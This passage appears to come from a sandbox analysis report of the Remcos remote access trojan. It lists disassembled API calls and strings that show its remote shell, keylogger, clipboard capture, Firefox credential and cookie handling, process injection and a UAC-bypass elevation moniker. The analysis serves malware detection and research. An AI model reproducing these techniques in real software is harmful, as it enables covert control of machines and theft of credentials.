                                                                                                            • API String ID: 724789610-0
                                                                                                            • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                            • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                            • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                            • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: recv
                                                                                                            • String ID:
                                                                                                            • API String ID: 1507349165-0
                                                                                                            • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                            • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                            • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                            • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: send
                                                                                                            • String ID:
                                                                                                            • API String ID: 2809346765-0
                                                                                                            • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                            • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                            • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                            • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                              • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                              • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                              • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                              • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                              • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                              • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                            • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                              • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                              • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                              • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                            • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                              • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                            • API String ID: 2918587301-599666313
                                                                                                            • Opcode ID: 9f2cd6a3d13f6cb2b06b8496575b7c5252782f8eaeba4f4dea789b5e1a27efcd
                                                                                                            • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                            • Opcode Fuzzy Hash: 9f2cd6a3d13f6cb2b06b8496575b7c5252782f8eaeba4f4dea789b5e1a27efcd
                                                                                                            • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                            • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                            • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                            • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                            • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                            • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                            • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                            • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                            • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                            • API String ID: 3815868655-81343324
                                                                                                            • Opcode ID: a327936dd0592c9695a0c2778442a59709dd3e77499e6f7e66c7972828f539dd
                                                                                                            • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                            • Opcode Fuzzy Hash: a327936dd0592c9695a0c2778442a59709dd3e77499e6f7e66c7972828f539dd
                                                                                                            • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                            • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                            • API String ID: 65172268-860466531
                                                                                                            • Opcode ID: 639bfacccf61b4a7a246b99b22c6bb3c911c191bbe166e2da80c33d4b188edd7
                                                                                                            • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                            • Opcode Fuzzy Hash: 639bfacccf61b4a7a246b99b22c6bb3c911c191bbe166e2da80c33d4b188edd7
                                                                                                            • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFile$FirstNext
                                                                                                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                            • API String ID: 1164774033-3681987949
                                                                                                            • Opcode ID: 2316961ae5f52f31cc477e1d09f773a4a7350a98b7632d2531bc2c7add8855b4
                                                                                                            • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                            • Opcode Fuzzy Hash: 2316961ae5f52f31cc477e1d09f773a4a7350a98b7632d2531bc2c7add8855b4
                                                                                                            • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$Close$File$FirstNext
                                                                                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                            • API String ID: 3527384056-432212279
                                                                                                            • Opcode ID: 6413a42ae19e7c89ed42c643cb52caeedd1e1ba2e9febfa8c5afa48b91d55771
                                                                                                            • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                            • Opcode Fuzzy Hash: 6413a42ae19e7c89ed42c643cb52caeedd1e1ba2e9febfa8c5afa48b91d55771
                                                                                                            • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                            • API String ID: 726551946-3025026198
                                                                                                            • Opcode ID: 72761ffefe35e3790d33003bddd1b3aca3f5aeffe8a7e6c700e9af830a7ff8c7
                                                                                                            • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                            • Opcode Fuzzy Hash: 72761ffefe35e3790d33003bddd1b3aca3f5aeffe8a7e6c700e9af830a7ff8c7
                                                                                                            • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                            APIs
                                                                                                            • OpenClipboard.USER32 ref: 004159C7
                                                                                                            • EmptyClipboard.USER32 ref: 004159D5
                                                                                                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3520204547-0
                                                                                                            • Opcode ID: 8a84b0237ca338e1a3ed05f80deb3638e9beb60abd9708b2ae7a1dceee0212da
                                                                                                            • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                            • Opcode Fuzzy Hash: 8a84b0237ca338e1a3ed05f80deb3638e9beb60abd9708b2ae7a1dceee0212da
                                                                                                            • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0$1$2$3$4$5$6$7
                                                                                                            • API String ID: 0-3177665633
                                                                                                            • Opcode ID: a67fb25c249552ee9189d14a7b82946051c82c8a43c29b1558aee354ad113b8a
                                                                                                            • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                            • Opcode Fuzzy Hash: a67fb25c249552ee9189d14a7b82946051c82c8a43c29b1558aee354ad113b8a
                                                                                                            • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                            • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                            • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                            • String ID: 8[G
                                                                                                            • API String ID: 1888522110-1691237782
                                                                                                            • Opcode ID: 62c4c2556f5e099e9a9792d70b860f0f67bc178eac4334f9f50af38fee2ec64e
                                                                                                            • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                            • Opcode Fuzzy Hash: 62c4c2556f5e099e9a9792d70b860f0f67bc178eac4334f9f50af38fee2ec64e
                                                                                                            • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00406788
                                                                                                            • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Object_wcslen
                                                                                                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                            • API String ID: 240030777-3166923314
                                                                                                            • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                            • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                            • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                            • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                            APIs
                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                            • GetLastError.KERNEL32 ref: 00419935
                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3587775597-0
                                                                                                            • Opcode ID: e6033344e76624b76c557f99416062224b41f49b53caf68f690f3f5c68b54efc
                                                                                                            • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                            • Opcode Fuzzy Hash: e6033344e76624b76c557f99416062224b41f49b53caf68f690f3f5c68b54efc
                                                                                                            • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                            • String ID: <D$<D$<D
                                                                                                            • API String ID: 745075371-3495170934
                                                                                                            • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                            • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                            • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                            • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                            • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                            • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                            • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                            • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                            • String ID: Keylogger initialization failure: error $`#v
                                                                                                            • API String ID: 3219506041-3226811161
                                                                                                            • Opcode ID: 5dd7d4e87483909495a537fcad95406c8ded85d18e3ccefef833e7d42386b7cb
                                                                                                            • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                            • Opcode Fuzzy Hash: 5dd7d4e87483909495a537fcad95406c8ded85d18e3ccefef833e7d42386b7cb
                                                                                                            • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
